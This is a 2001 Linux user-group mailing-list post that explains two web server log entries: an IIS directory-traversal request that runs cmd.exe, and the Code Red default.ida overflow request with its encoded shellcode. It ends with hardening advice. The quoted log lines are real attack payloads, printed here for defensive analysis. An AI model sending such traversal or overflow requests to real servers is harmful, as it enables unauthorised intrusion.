[ale] Code Red 2

Dan Mount danmail at bubber.com
Tue Aug 7 17:59:33 EDT 2001


I know that you probably not running IIS, but here's the
descriptions....

> Here is what I think is an attempt by the second variant of the code
> red......
> 
> Am I right?
> 
> 24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET
> /scripts/..%255c..%255cwinnt/
> system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 
> HTTP/1.0" 404 314 "-"
> "-"

This is a different attack trying to exploit an IIS server that allows
relative paths. If you look at the request like it would be typed at the
command prompt it would look like: 

"c:\inetpub\scripts\..\..\winnt\system32\cmd.exe ping -n 1 -l 128
24.41.73.126"

This would only work if the IIS server allowed relative paths and the
actual web root lived on "c:".

> 209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET
> /default.ida?XXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u685
> 8%ucbd3%u7801%
> u909
> 0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%
> u00c3%u0003%u8
> b00%
> u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 285 "-" "-"
> 20

This is an attack against Index Server. Very simply, the Microsoft
supplied default.ida file (or one that works the same way) must live in
the web root to allow Code Red to work... This file is included in the
Default web set up with IIS. Using the default web, or settings on most
OSs is not a very good idea. It'd be similar to installing RedHat on a
machine then hooking it up to the internet without any hardening. I
think we all know that's a bad idea, so is using the default web with
IIS. Leaving your web content on the same partition as the OS critical
files is a bad idea as well. 

Not using the IIS's default web and moving the web content to a
different partition will keep you clean of these two particular
things... Just like everything else, there's more to it than that to be
safe though...

Just my .02

DM
--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.





More information about the Ale mailing list